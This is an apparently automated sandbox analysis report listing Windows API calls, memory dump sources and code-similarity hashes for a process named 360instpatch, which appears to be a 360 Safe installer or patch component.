                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1964944973-0
                                                                                                                                                                                                              • Opcode ID: 3516abe15e857e6f40089f4e6b6af020d90765784581153068c3399b7bf6cb0a
                                                                                                                                                                                                              • Instruction ID: 3ad14469e09dc7b40e7926a1814c92e7892562c27f03c785d43e1212e2a6da8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3516abe15e857e6f40089f4e6b6af020d90765784581153068c3399b7bf6cb0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1311E972A00105EBD704CF64C85175DF3A6BF54314F70811AE918E76C0DB79BAA2CBE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00B620B3
                                                                                                                                                                                                                • Part of subcall function 00B47451: BeginPaint.USER32(?,?), ref: 00B4746E
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00B620E0
                                                                                                                                                                                                                • Part of subcall function 00B47323: CreateCompatibleDC.GDI32(?), ref: 00B47347
                                                                                                                                                                                                                • Part of subcall function 00B47323: SelectObject.GDI32(?,?), ref: 00B4736E
                                                                                                                                                                                                                • Part of subcall function 00B47323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00B47387
                                                                                                                                                                                                                • Part of subcall function 00B56537: GetWindowRect.USER32(?,00000000), ref: 00B56554
                                                                                                                                                                                                                • Part of subcall function 00B61F15: __EH_prolog3.LIBCMT ref: 00B61F1C
                                                                                                                                                                                                                • Part of subcall function 00B61F15: IsWindowEnabled.USER32(?), ref: 00B61F26
                                                                                                                                                                                                                • Part of subcall function 00B61F15: GetClientRect.USER32(?,?), ref: 00B61F5D
                                                                                                                                                                                                                • Part of subcall function 00B61F15: GetWindowTextW.USER32(?,00000000,00000080), ref: 00B61FA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: RectWindow$Client$BeginCompatibleCreateEnabledH_prolog3H_prolog3_ObjectPaintSelectTextViewport
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2602395704-0
                                                                                                                                                                                                              • Opcode ID: 714cdcec14007ae9ffffe19332fd31a4fffb1df7e6f1b001b09f076baf9b5393
                                                                                                                                                                                                              • Instruction ID: 37eb98849ce4d224ff14c3d181f1d722b33c1dcb9f898c141c15e16de7fd2f7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 714cdcec14007ae9ffffe19332fd31a4fffb1df7e6f1b001b09f076baf9b5393
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A611D071C04A08CAEF11EB94C881DADFBFAFF55300F10808AE549A7251CF345A05DB21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: __EH_prolog3_catch.LIBCMT ref: 6BF0E546
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: __CxxThrowException@8.LIBCMT ref: 6BF0E56A
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 6BF0E5F1
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: GetLastError.KERNEL32 ref: 6BF0E600
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 6BF0E628
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: GetLastError.KERNEL32 ref: 6BF0E632
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 6BF0E64B
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: GetLastError.KERNEL32 ref: 6BF0E658
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11F6F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11F74
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CountCreateTickTimerWaitable$Exception@8H_prolog3_catchMutexThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1909352761-0
                                                                                                                                                                                                              • Opcode ID: 6987e6f4b6dad5032c5a38376070ebec8676fdbd6775d79fb3c131a958f7f8b5
                                                                                                                                                                                                              • Instruction ID: f3a7c89f5071829cd2da4f64bd772befa5b61024fdfb0c6d47af992fcaccff4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6987e6f4b6dad5032c5a38376070ebec8676fdbd6775d79fb3c131a958f7f8b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 981118B1904B919EC370CF3B8884D97FAF8FBE6B04750091EE596C2A20E775E440CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000E,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?,00000001,?,?,?,00000000), ref: 6CD34D23
                                                                                                                                                                                                              • CreateWindowExW.USER32(?,00000000,?,?,?,00000002,?,?,?,00000000,?,6CE53338), ref: 6CD34D94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732789607-0
                                                                                                                                                                                                              • Opcode ID: d9a44395c12f11ffe78540810b7551e8897cbe05eb5522e6847ec10e7382e427
                                                                                                                                                                                                              • Instruction ID: a36fa85dd2d3b4d176dda64cb7f4c1c902ed253e26db0dd8e9d3ea80bcbcb3d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a44395c12f11ffe78540810b7551e8897cbe05eb5522e6847ec10e7382e427
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3115A35200219EFDB028F55DC05FEA7BB9EF4A314F019119FC189A6A0D7BAD860CFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF1AE44
                                                                                                                                                                                                                • Part of subcall function 6BF16EF2: GetTickCount.KERNEL32 ref: 6BF16EFF
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 6BF1AEAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1305442257-0
                                                                                                                                                                                                              • Opcode ID: 0e712ef447b0bc317e747afaff4c5451ebb011c2f63973ebb650cdadd47f34c4
                                                                                                                                                                                                              • Instruction ID: 71644608de2d80c4682d1b25fd5ad3650d97602a7c49d7bff67efd24db45b7e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e712ef447b0bc317e747afaff4c5451ebb011c2f63973ebb650cdadd47f34c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112572A00101BBCF149BB4C888FDEBBB8FF08314F004659F515D71A0DB389814CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 533350023-0
                                                                                                                                                                                                              • Opcode ID: a1d93375e4bdf8e7f20f69ce02c1bb7fde569b814ff6f9c521eeeefd3afe433d
                                                                                                                                                                                                              • Instruction ID: f4be8585a040d41e50349a0c4c3e2a06e49527d9a4bc5dfbb1fe27474c1358f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d93375e4bdf8e7f20f69ce02c1bb7fde569b814ff6f9c521eeeefd3afe433d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A01257390021A9AEB30DBA4CC81FFEB3ACAF1A308F504579D515D61D1EBB89508DB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B2898E: RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00B289A8
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00B7EAA4,?,?,00100000,00000000,0000008C), ref: 00B820EE
                                                                                                                                                                                                                • Part of subcall function 00B28940: RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00B28967
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateCriticalInitializeOpenSection
                                                                                                                                                                                                              • String ID: SOFTWARE\360Safe\softmgr\dio
                                                                                                                                                                                                              • API String ID: 2223640745-1814773269
                                                                                                                                                                                                              • Opcode ID: 1870a4c525f826f766e4172b6f4b0de6686d9053b78e42fedbafb974d8973945
                                                                                                                                                                                                              • Instruction ID: 6d1efc7805ca4dfa4591f400e02a9a9a5177bc089295cd1d57df4098d1363f8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1870a4c525f826f766e4172b6f4b0de6686d9053b78e42fedbafb974d8973945
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B0178B0640719AAD3309F699CC1867FBECFF087503904A6EE19AC3A92DA70B9448720
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF23C52: CloseHandle.KERNEL32(00000000,6BFCC288,6BF2497A,00000001,6BFCC288,00000000,6BF11C74,?), ref: 6BF23C5D
                                                                                                                                                                                                                • Part of subcall function 6BEE9134: _wcslen.LIBCMT ref: 6BEE913B
                                                                                                                                                                                                              • CreateFileW.KERNEL32(6BFCC28C,40000000,00000001,00000000,00000004,00000000,00000000,6BFCC288,00000001,6BFCC288,00000000,6BF11C74,?), ref: 6BF249A5
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,00000000,?,?,6BF8AC78), ref: 6BF249BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointer_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4003891552-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00B465F1
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00B465FD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Rect$ClientInvalidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 645284650-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonlhtons
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 493294928-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonlhtons
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 493294928-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6BEE7D5A
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE7D6F
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4063778783-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6BEE7D0D
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE7D22
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4063778783-0
                                                                                                                                                                                                              • Opcode ID: 11b48289416c79de121b9d88de99cfb3b0c52266f26bd5d76d2d81d28359c016
                                                                                                                                                                                                              • Instruction ID: 7dfe67e25527dc37e33ecf567a4fca955c3248f184011479a3ff9f1481bc6a1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11b48289416c79de121b9d88de99cfb3b0c52266f26bd5d76d2d81d28359c016
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E09B739101086AD748DEB8D441FEE77BDEB44254F20826DD826D1095DB7DD6448BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 6CD9B943
                                                                                                                                                                                                              • PathIsDirectoryW.SHLWAPI(?), ref: 6CD9B94E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$DirectoryExistsFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1302732169-0
                                                                                                                                                                                                              • Opcode ID: 09b41a08c8545e0ab651c89f872e0dc66698475bafdb43a7667eeedfc6aab193
                                                                                                                                                                                                              • Instruction ID: cea22c1254d0150e5ba21418027440c809527a4bb212f8fa16c53320d2c27611
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b41a08c8545e0ab651c89f872e0dc66698475bafdb43a7667eeedfc6aab193
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62E01A36312251FB97219B665C08B6B36B8AF86B54B12441DF580EA664D714C802C6A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000E), ref: 00B2AA58
                                                                                                                                                                                                              • CreateDialogParamW.USER32(00000081,?,Function_0001A96B,?), ref: 00B2AA89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDialogErrorLastParam
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445605341-0
                                                                                                                                                                                                              • Opcode ID: 64fe0d119874183ff03a2939cf568167180d45485d69c13834691cdded12670e
                                                                                                                                                                                                              • Instruction ID: 763641d520d88ab3a8e963386360596b90b1ca1b291e2419dd9b78994db7be2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64fe0d119874183ff03a2939cf568167180d45485d69c13834691cdded12670e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AE04832594320BBD711AB20ED06FEA7FD8BF19F01F014865B55DA60E0EFA19C54C766
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF26DCB: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,00000000,6BF8AC78,74DF30D0,?,6BFCC3F0,6BFCC288), ref: 6BF26DF2
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(00000000,6BF0EB14,00000000,00000004,00000000,00000004,6BF8AC78,6BF0EB14,LastUploadDate,00000000,?,6BFCC3F0,6BFCC288), ref: 6BF26F5F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,6BFCC3F0,6BFCC288), ref: 6BF26F66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 779948276-0
                                                                                                                                                                                                              • Opcode ID: bfd60810f9adfbb9bf81968cae532d2fbde936fd5b3c513b46da18261469f2c9
                                                                                                                                                                                                              • Instruction ID: f3b9400530226fd478c0d153807f7377865001c5c868128f1c7e3cc150dec961
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfd60810f9adfbb9bf81968cae532d2fbde936fd5b3c513b46da18261469f2c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10D05E33446B3177DA92AAA8AC05FCF3B986F56720F050480FB409A1A4C724D98F57EA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005,00BFBC8C,00B2AFA3,?), ref: 00B467FA
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,00BFBC8C,00B2AFA3,?), ref: 00B46809
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                                                              • Opcode ID: f2a1a8429180fe5963e47266fe7edcf430fe6ccedd9777365a520c27b218dbce
                                                                                                                                                                                                              • Instruction ID: 6567f3a62ae9a599c9d12f50b0bd7edb446c1d1c8fd7fcf11781f1ddc3ce0cab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2a1a8429180fe5963e47266fe7edcf430fe6ccedd9777365a520c27b218dbce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3E01A31145600FAE2219B20CC0AFD9B7E1FB25706F51886EB1D1620A0D7B56940DA46
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,6BF0CFA0), ref: 6BEECF0F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,6BF0CFA0), ref: 6BEECF27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2633145722-0
                                                                                                                                                                                                              • Opcode ID: db8d3bdb1ca809e3aace396949b2585773a9970eb1cee66b903845f2c4a3c3e4
                                                                                                                                                                                                              • Instruction ID: 0e00105572a2f619bf2451ca1c0883ff9310888e973abd1f841798cd2669281d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db8d3bdb1ca809e3aace396949b2585773a9970eb1cee66b903845f2c4a3c3e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45E08633600501DBC6145A28D804A86BBB5BB923317354749E0B8D33E0D734E45BC6B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,6BF0CF98), ref: 6BEED3A4
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,6BF0CF98), ref: 6BEED3BC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2633145722-0
                                                                                                                                                                                                              • Opcode ID: 937e93ae96adbf9fa97c7a05ea6d897d984c448dbaae1c97365c16360b7f1428
                                                                                                                                                                                                              • Instruction ID: 22a2a7f8ec8a7c9a962556a0e22b6f96dbf7ac0dda79f96a8e887da6cc64dd24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 937e93ae96adbf9fa97c7a05ea6d897d984c448dbaae1c97365c16360b7f1428
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE08C37100541DBC6145A28D8489C9B7B5BBC3336775879AE0B5D32A0EB34A8AB8AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6BF3ABBC
                                                                                                                                                                                                                • Part of subcall function 6BF3F185: __getptd_noexit.LIBCMT ref: 6BF3F188
                                                                                                                                                                                                                • Part of subcall function 6BF3F185: __amsg_exit.LIBCMT ref: 6BF3F195
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: __IsNonwritableInCurrentImage.LIBCMT ref: 6BF3AB86
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: __getptd_noexit.LIBCMT ref: 6BF3AB96
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: __freeptd.LIBCMT ref: 6BF3ABA0
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: ExitThread.KERNEL32 ref: 6BF3ABA9
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 6BF3ABDD
                                                                                                                                                                                                                • Part of subcall function 6BF42CFD: __getptd_noexit.LIBCMT ref: 6BF42D05
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 393088965-0
                                                                                                                                                                                                              • Opcode ID: 8ad10e1ac54e233bd4b421ae6b86792132a121253e87e9c1ce07abfc65ca4883
                                                                                                                                                                                                              • Instruction ID: 88f92c02908d17cdeb758f2f279ee13b26c7eed8c9a475f98c84992a9919e0b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ad10e1ac54e233bd4b421ae6b86792132a121253e87e9c1ce07abfc65ca4883
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E0ECB2914606AFEB18ABB0D906E2E7776EF44215F210099E1019B2B1CB7E99409A60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B9E9D4
                                                                                                                                                                                                                • Part of subcall function 00BA4E30: __getptd_noexit.LIBCMT ref: 00BA4E33
                                                                                                                                                                                                                • Part of subcall function 00BA4E30: __amsg_exit.LIBCMT ref: 00BA4E40
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: __IsNonwritableInCurrentImage.LIBCMT ref: 00B9E99E
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: __getptd_noexit.LIBCMT ref: 00B9E9AE
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: __freeptd.LIBCMT ref: 00B9E9B8
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: ExitThread.KERNEL32 ref: 00B9E9C1
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 00B9E9F5
                                                                                                                                                                                                                • Part of subcall function 00BAAE94: __getptd_noexit.LIBCMT ref: 00BAAE9C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
